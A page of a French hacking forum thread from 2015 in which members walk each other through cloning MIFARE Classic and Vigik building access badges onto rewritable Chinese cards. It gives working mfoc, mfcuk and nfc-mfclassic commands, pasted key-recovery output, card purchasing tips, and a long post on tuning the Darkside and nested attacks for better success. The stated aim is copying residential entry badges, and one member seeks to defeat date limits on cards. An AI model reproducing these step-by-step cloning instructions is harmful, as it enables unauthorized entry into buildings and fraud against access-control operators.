logo

Knowledge Is Power

 
 

- Reinit des nouveaux posts -

- Recherche -

Messages Privés - Derniers posts
S'enregistrer - Login - Liste des membres
Vous logger : Login Pass

Challenges >> Challenge VIGIK Newtopic | Reply
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | Page suivante
poster txt
Theguilt
Inscrit le 30-01-2015
Posté le 07-03-2015 18:03

Merci pour l'info mais as tu un lien?
Merci
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 07-03-2015 19:02

j'ai mis un lien au debut de la page 7

je dirai sur ebay.
en tout cas, TOUT mon "materiel" vient de là.
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 07-03-2015 20:15

petit souci sur ton lien ebay;

Malheureusement, l'accès à cet objet a été bloqué en raison de restrictions légales en vigueur dans certains pays. Conformément à ces restrictions, nous nous efforçons de bloquer l'affichage des objets concernés. Nous regrettons de vous informer que pour des raisons techniques, les utilisateurs ne pourront pas afficher certaines annonces qui ne relèvent pas de ces restrictions. Nous vous prions de nous excuser pour les désagréments occasionnés et nous espérons que vous trouverez d'autres objets intéressants sur eBay.
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 08-03-2015 11:46

oui, ca arrive parfois cette connerie dans ebay...

bref, des mots clés comme : uid0,
uid changeable, mifare uid rewrite ...
feront surement ton bonheur.
compter environ 6 euros piece.
un français en vend à environ 8 euros, ca reste correct.

sinon, up pour un dmp sous forme de txt avec les services
integrés.

merci beaucoup.
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 09-03-2015 23:10

celui ci est il bon?

http://www.ebay.fr/itm/Badge-RFID-Classic-Mifare-1K-Avec-UID-Block-0-Rewritable-changeable-NFC-/181679943092?pt=LH_DefaultDomain_71&hash=item2a4cf7edb4

Attention, il vous faut le matériel adapté et la librairie libnfc afin de modifier cet UID.
Je pourrai quand meme modifier sur kali linux avec;

sudo mfoc -P 500 -O blank-chinese.dmp

sudo mfoc -P 500 -O cardtocopy.dmp

sudo nfc-mfclassic W X cardtocopy.dmp blank-chinese.dmp

Cela suffira?

Merci

Merci
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 10-03-2015 20:45

bonjour

oui c'est parfait.

normalement, si une clé est connu, mfoc suffira
a te faire un clone parfait avec les commandes
que tu as posté.

si aucunes clés n'est connue sur le badge a copier,
mfoc te le dira et il faudra utiliser mfcuk.

j'espere pour toi que ce que tu veux copier n'est pas
un badge mifare de derniere generation car ca ne
fonctionne plus...

tiens nous au courant.
++

up pour un dump au format txt avec un des "service" integré
merci
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 11-03-2015 15:31

Bonjour, merci pour tes réponses.
Pour copier un Badge mifare de dernière génération il n'y a plu de solution?

Merci
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 11-03-2015 17:55

bonjour

et bien disons que mfoc fonctionne encore si une
des cles du badge est connue (codée dans mfoc)

par contre mfcuk et le pourquoi de son utilité non.
il "cherche" sans fin et donc impossible de sortir
une cle a balancer dans mfoc sous cette forme :

mfoc -P 500 -k AABBCCDDEEFF -O cardtocopy.dmp

voila...

tu verras quand tu auras programmé ton badge chinois,
normalement mfcuk ne fonctionnera plus.

up pour ma demande, merci !!!
profil | edit | quote
blabla00
Inscrit le 20-11-2014
Posté le 12-03-2015 11:21

Bonjour,

Sur les badges dernière génération, même en connaissant certaines clés, l'attaque mfoc ne fonctionne plus.

Test effectué sur un badge: il me manquait 3 clés, j'ai laissé mfoc tourner pendant des heures avec des distances différentes et rien n'est tombé.

Il faut vite se dépêcher de trouver le nouvel algo utilisé pour prendre de l'avance sur le crackage des badges nouvelle génération.
profil | edit | quote
jokeirrocher
Inscrit le 15-03-2015
Posté le 15-03-2015 04:18

Bonjour
je suis fortement interresé par le sujet car je crack des cartes avec mifare pour la prospection des pizza kebab etc mais j'aimerais savoir si vus avez eu la solution pour enlever la limite de dates et heurs svp.
Répondez en pv ou par mail svp. Merci
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 16-03-2015 23:23

Bonjour, j'ai reussi a faire une copie d'une carte banale recu avec mon lecteur encodeur ACR122, sur une carte chinoise.
oufffff. avec cette manip:

sudo mfoc -P 500 -O blank-chinese.dmp

sudo mfoc -P 500 -O cardtocopy.dmp

sudo nfc-mfclassic W X cardtocopy.dmp blank-chinese.dmp

Par contre j'ai un badge d'immeuble (mifare Hexact) et je coince a la deuxieme ligne;

sudo mfoc -P 500 -O cardtocopy.dmp

No sector encrypted with the default key has been found, exiting..

As tu une soulution Gambit? (mfcuk????)

merci
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 19-03-2015 16:54

bonjour.

malheureusement, je pense que c'est un nouveau badge
mifare (vigik)

http://www.hexact.fr/les-produits/decouvrez-les-produits/97.html
ils se vantent meme de "inviolabilité" de leur produit
dans le descriptif.

quelqu'un en parle depuis des mois.
http://www.proxmark.org/forum/viewtopic.php?id=2111

neanmoins, tu peux tenter un mfcuk evidement mais .....

sudo mfcuk -C -R 0 -s 250 -S 250 -v 3 -o cardtocopy.dmp

attention, le dump eventuel n'est pas exploitable par nfc-mfclassic.
il est utile pour forcer une clé eventuellement trouvée
dans mfoc

mfoc -P 500 -k AABBCCDDEEFF -O cardtocopy.dmp

j'espre que ça ira, sinon essais de trouver un "vieux" badge
chez un voisin.
a++
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 19-03-2015 20:48

Voila le resultat,je sais pas si je fais les choses bien;

root@kali:~# mfoc -P 500 -k AABBCCDDEEFF -O cardtocopy.dmp
The custom key 0xaabbccddeeff has been added to the default keys
ISO/IEC 14443A (106 kbps) target:
ATQA (SENS_RES): 00 04
* UID size: single
* bit frame anticollision supported
UID (NFCID1): bb 4f 7f 84
SAK (SEL_RES): 08
* Not compliant with ISO/IEC 14443-4
* Not compliant with ISO/IEC 18092

Fingerprinting based on MIFARE type Identification Procedure:
* MIFARE Classic 1K
* MIFARE Plus (4 Byte UID or 4 Byte RID) 2K, Security level 1
* SmartMX with MIFARE 1K emulation
Other possible matches based on ATQA & SAK values:

Try to authenticate to all sectors with default keys...
Symbols: '.' no key found, '/' A key found, '\' B key found, 'x' both keys found
[Key: aabbccddeeff] -> [................]
[Key: ffffffffffff] -> [................]
[Key: a0a1a2a3a4a5] -> [................]
[Key: d3f7d3f7d3f7] -> [................]
[Key: 000000000000] -> [................]
[Key: b0b1b2b3b4b5] -> [................]
[Key: 4d3a99c351dd] -> [................]
[Key: 1a982c7e459a] -> [................]
[Key: aabbccddeeff] -> [................]
[Key: 714c5c886e97] -> [................]
[Key: 587ee5f9350f] -> [................]
[Key: a0478cc39091] -> [................]
[Key: 533cb6c723f6] -> [................]
[Key: 8fd0a4f256e9] -> [................]

Sector 00 - UNKNOWN_KEY [A] Sector 00 - UNKNOWN_KEY [B]
Sector 01 - UNKNOWN_KEY [A] Sector 01 - UNKNOWN_KEY [B]
Sector 02 - UNKNOWN_KEY [A] Sector 02 - UNKNOWN_KEY [B]
Sector 03 - UNKNOWN_KEY [A] Sector 03 - UNKNOWN_KEY [B]
Sector 04 - UNKNOWN_KEY [A] Sector 04 - UNKNOWN_KEY [B]
Sector 05 - UNKNOWN_KEY [A] Sector 05 - UNKNOWN_KEY [B]
Sector 06 - UNKNOWN_KEY [A] Sector 06 - UNKNOWN_KEY [B]
Sector 07 - UNKNOWN_KEY [A] Sector 07 - UNKNOWN_KEY [B]
Sector 08 - UNKNOWN_KEY [A] Sector 08 - UNKNOWN_KEY [B]
Sector 09 - UNKNOWN_KEY [A] Sector 09 - UNKNOWN_KEY [B]
Sector 10 - UNKNOWN_KEY [A] Sector 10 - UNKNOWN_KEY [B]
Sector 11 - UNKNOWN_KEY [A] Sector 11 - UNKNOWN_KEY [B]
Sector 12 - UNKNOWN_KEY [A] Sector 12 - UNKNOWN_KEY [B]
Sector 13 - UNKNOWN_KEY [A] Sector 13 - UNKNOWN_KEY [B]
Sector 14 - UNKNOWN_KEY [A] Sector 14 - UNKNOWN_KEY [B]
Sector 15 - UNKNOWN_KEY [A] Sector 15 - UNKNOWN_KEY [B]
mfoc: ERROR:

No sector encrypted with the default key has been found, exiting..
root@kali:~# sudo mfcuk -C -R 0 -s 250 -S 250 -v 3 -o cardtocopy.dmp

mfcuk - 0.3.8
Mifare Classic DarkSide Key Recovery Tool - 0.3
by Andrei Costin, zveriu@gmail.com, http://andreicostin.com

WARN: cannot open template file './data/tmpls_fingerprints/mfcuk_tmpl_skgt.mfd'
WARN: cannot open template file './data/tmpls_fingerprints/mfcuk_tmpl_ratb.mfd'
WARN: cannot open template file './data/tmpls_fingerprints/mfcuk_tmpl_oyster.mfd'

INFO: Connected to NFC reader: ACS / ACR122U PICC Interface



INITIAL ACTIONS MATRIX - UID bb 4f 7f 84 - TYPE 0x08 (MC1K)
---------------------------------------------------------------------
Sector | Key A |ACTS | RESL | Key B |ACTS | RESL
---------------------------------------------------------------------
0 | 000000000000 | . R | . . | 000000000000 | . R | . .
1 | 000000000000 | . . | . . | 000000000000 | . . | . .
2 | 000000000000 | . . | . . | 000000000000 | . . | . .
3 | 000000000000 | . . | . . | 000000000000 | . . | . .
4 | 000000000000 | . . | . . | 000000000000 | . . | . .
5 | 000000000000 | . . | . . | 000000000000 | . . | . .
6 | 000000000000 | . . | . . | 000000000000 | . . | . .
7 | 000000000000 | . . | . . | 000000000000 | . . | . .
8 | 000000000000 | . . | . . | 000000000000 | . . | . .
9 | 000000000000 | . . | . . | 000000000000 | . . | . .
10 | 000000000000 | . . | . . | 000000000000 | . . | . .
11 | 000000000000 | . . | . . | 000000000000 | . . | . .
12 | 000000000000 | . . | . . | 000000000000 | . . | . .
13 | 000000000000 | . . | . . | 000000000000 | . . | . .
14 | 000000000000 | . . | . . | 000000000000 | . . | . .
15 | 000000000000 | . . | . . | 000000000000 | . . | . .


VERIFY:
Key A sectors: 0 1 2 3 4 5 6 7 8 9 a b c d e f
Key B sectors: 0 1 2 3 4 5 6 7 8 9 a b c d e f


ACTION RESULTS MATRIX AFTER VERIFY - UID bb 4f 7f 84 - TYPE 0x08 (MC1K)
---------------------------------------------------------------------
Sector | Key A |ACTS | RESL | Key B |ACTS | RESL
---------------------------------------------------------------------
0 | 000000000000 | . R | . . | 000000000000 | . R | . .
1 | 000000000000 | . . | . . | 000000000000 | . . | . .
2 | 000000000000 | . . | . . | 000000000000 | . . | . .
3 | 000000000000 | . . | . . | 000000000000 | . . | . .
4 | 000000000000 | . . | . . | 000000000000 | . . | . .
5 | 000000000000 | . . | . . | 000000000000 | . . | . .
6 | 000000000000 | . . | . . | 000000000000 | . . | . .
7 | 000000000000 | . . | . . | 000000000000 | . . | . .
8 | 000000000000 | . . | . . | 000000000000 | . . | . .
9 | 000000000000 | . . | . . | 000000000000 | . . | . .
10 | 000000000000 | . . | . . | 000000000000 | . . | . .
11 | 000000000000 | . . | . . | 000000000000 | . . | . .
12 | 000000000000 | . . | . . | 000000000000 | . . | . .
13 | 000000000000 | . . | . . | 000000000000 | . . | . .
14 | 000000000000 | . . | . . | 000000000000 | . . | . .
15 | 000000000000 | . . | . . | 000000000000 | . . | . .


RECOVER: 0error libnfc.driver.acr122_usb Unable to claim USB interface (Device or resource busy)
mfcuk: ERROR: connecting to NFC reader
root@kali:~#
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 19-03-2015 22:57

non non
ce n'est pas ça
tu dois lancer la commande mfcuk en premier.
et s'il trouve une clé tu l'utilises dans mfoc a la place de
AABBCC.....
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 20-03-2015 08:52

j'ai repondu trop vite
je n'ai pas fait attention à ta tentative par mfcuk
de prime abord tu n'as rien trouvé, donc je pense que c'est
mort pour cette serie de badge.
tu as peut etre une chance car il semble qu'il te plante avant de finir chercher non ??
profil | edit | quote
Theguilt
Inscrit le 30-01-2015
Posté le 20-03-2015 11:56

jai un otre souci je suis sur kali linux avec virtualbox avec mac, et mon lecteur ACR122 se fraise je sais pas pourquoi.
Tu as une idee?
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 20-03-2015 12:48

bonjour
c'est a cause des timings de l'usb dans
les machines virtuelles.
deja, tu arrives a cloner des badges c'est beau
car normalement, ça ne fonctionne pas.
il faudrait que tu ais une distribution d'installée
sur un autre ordi. ou veritablement sur ton mac.
profil | edit | quote
blabla00
Inscrit le 20-11-2014
Posté le 20-03-2015 16:50

Oui et non pour la VM:

J'arrive a casser tous mes badges sur VM (et il me manque toujours une ou plusieurs clés et mfoc arrive a les trouver).

J'utilise VirtualBox ET VMWare, donc normalement les 2 fonctionnent.

A noter que sous kali je te conseille ca:
root@kali# modprobe -r pn533

Donc normalement ca fonctionne sous VM mais oui les perfs USB sont violées par rapport à un système natif.
profil | edit | quote
gambit
Inscrit le 26-09-2014
Posté le 21-03-2015 17:20

je ne pensais pas que ça pouvais marcher sous vmware et autres.
je n'ai en fait jamais essayé
c'etait pour ce que j'avais pu en lire ça et là.


tu peux aussi essayer de "killer" le deamon pcscd
si le modprobe ne suffit pas pour que mfcuk ne plante pas.
profil | edit | quote
Vigilante
Inscrit le 25-03-2015
Posté le 25-03-2015 14:17

Quelques infos :

L'UID de la carte NFC ne semble pas être pris en compte, du moins pour les cartes Vigik résidentielles, je sais pas si c'est aussi le cas pour les cartes plus "spéciales" (facteur, EDF, etc). En tout cas j'ai réussi sans soucis à écrire un dump d'un badge Vigik sur une autre carte avec un UID différent (et non changeable) et elle a fonctionné sans soucis.

Il exist deux attaques connues sur les cartes MIFARE Classic, l'attaque "Dark side" avec MFCUK qui exploite une faille dans le RNG de la carte et qui permet donc de prédire la "nonce" générée par la carte. Dans de bonnes conditions on peut obtenir une clé en environ 30 minutes.

La deuxième attaque c'est la "Offline nested" de Nethemba ( http://www.nethemba.com/mifare-classic-slides.pdf ) avec MFOC, celle-ci dépend sur la connaissance d'une seule clé (peu importe le secteur) pour ensuite pouvoir obtenir toutes les autres clés et dumper la carte par la même occasion.

Autrement dit si une clé est connue (par exemple si la carte utilise les clés par défaut), on peut directement utiliser MFOC pour obtenir toutes les autres clés et dumper la carte, si aucune des clés n'est connue il faut d'abord en obtenir une seule (avec MFCUK par exemple) pour ensuite la passer à MFOC qui se chargera de déduire les autres clés.

L'attaque dark side avec MFCUK exploite une faille dans le RNG de la carte, en clair quand la carte est réinitialisée (autrement dit on coupe le courant pendant un certain temps défini) et qu'on attend une période définie et fixe, la nonce générée par la carte sera prédictible. Quelques conseils :

- oubliez les VMs, les timings de l'USB ou du port série seront trop imprécis et la prédiction de nonce sera peu fiable (l'attaque prendra plusieurs heures ou ne fonctionnera pas du tout; MFCUK tournera dans le vide et abandonnera après un timeout de 24h)
- une petite distrib' Linux sera préférable (un Archlinux minimal sans interface graphique par exemple)
- mettre la priorité du processus MFCUK à -20 (les priorités, ou "niceness" sous Linux sont inversées, donc -20 correspond à temps réel et 20 correspond à priorité très faible, le défaut est 0)
- un lecteur fait maison à base de PN53* connecté via série (port série matériel + adaptateur RS232<->TTL ou convertisseur USB<->TTL genre un PL2303 ou chip FTDI équivalent) sera préférable à un lecteur ACS* ou similaire car les lecteurs ACS utilisent PC/SC pour communiquer avec le PC, autrement dit avec un lecteur ACS la communication sera MFCUK<->pcscd<->lecteur, tandis qu'un PN53* communiquera sans passer par pcscd, donc moins d'intermédiaires et timings plus fiables.
- un kernel RT (real time) pourra sûrement donner de meilleurs résultats mais je n'ai pas testé
- utiliser de l'I2C ou du SPI pour communiquer avec le PN53* sera peut-être mieux mais pas testé non plus, sachez que tout port VGA dispose d'une interface I2C et que la plupart des cartes graphiques (Intel en tout cas, aucune idée pour les autres) disposent de kernel modules permettant d'accéder à cette interface I2C. Aucune idée si les timings seront mieux qu'avec une interface série

Pour MFCUK il est obligatoire de spécifier des timings car ceux par défaut sont bien trop faibles (1ms par défaut pour drop field et constant delay). Certains conseillent de mettre 250ms pour les deux, ça marche mais ça me semble un peu trop élevé, je vous conseille d'expérimenter. J'arrive à obtenir des résultats satisfaisants avec 100ms pour drop field et 70ms pour constant delay.

Quand vous démarrez MFCUK avec l'argument "-v 3" (verbosité niveau 3), il vous affiche à chaque tentative le nombre de tentatives d'authentification et le total des différentes nonces reçues :

Code:

-----------------------------------------------------
Let me entertain you!
uid: a1b2c3d4
type: 08
key: 000000000000
block: 03
diff Nt: 4
auths: 4
-----------------------------------------------------



Le "diff Nt" correspond au nombre de nonces et le "auths" correspond au nombre de tentatives d'authentification. Ajustez vos timings de façon à avoir le moins de nonces possibles tout en ayant les "auths" augmenter le plus vite possible (il faut environ 5k auths pour casser une clé, et il y en a deux à casser - clé A et B - donc c'est dans votre intérêt de faire monter ce nombre le plus vite possible). Le nombre de nonces doit être autour de 400 à la fin de l'attaque, s'il dépasse ce nombre c'est que vous devez ajuster vos timings afin d'obtenir de meilleures perfs.

Si MFCUK vous donne des clés différentes (et incorrectes) à chaque fois c'est sûrement à cause de ce bug - https://code.google.com/p/mfcuk/issues/detail?id=21 - en clair les 4 derniers caractères de la clé seront toujours les mêmes tandis que tout le reste changera à chaque fois. Le bug semble être résolu d'après leur bugtracker mais j'ai constaté par moi même que ce n'était pas le cas avec la dernière version de MFCUK et LibNFC. Il faut donc compiler un ancienne version de MFCUK et le LibNFC qui va avec, plus d'infos ici : https://zozs.se/2014/08/18/acr122u-mfcuk-mfoc-cracking-mifare-classic-on-arch-linux/

Bonne chance <3

[ Ce Message a été édité par: Vigilante le 2015-03-25 14:24 ]
profil | edit | quote
Newtopic | Reply 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | Page suivante

Online : aejepecmitix, ayiboinumo, gambit, ihaobeke, izisoxe, Patrotimax, ucuxirayux, uxokbazov et 79 Guests


Retour Index NewFFR Repository : http://taz.newffr.com
Cagades à Stick : http://alcane.newffr.com
Forum HTML et Archive -> ici
ForumFR Sql/Xml (2006/04) (SF pas à jour du tout...) - Alive since 2001 Newffr.com
Pour toute plainte ou problème -> Contacter Borax, Hyatus, Tweakie ou Stick par message privé (ou Gueulez sur le forum :) )
Retour haut de page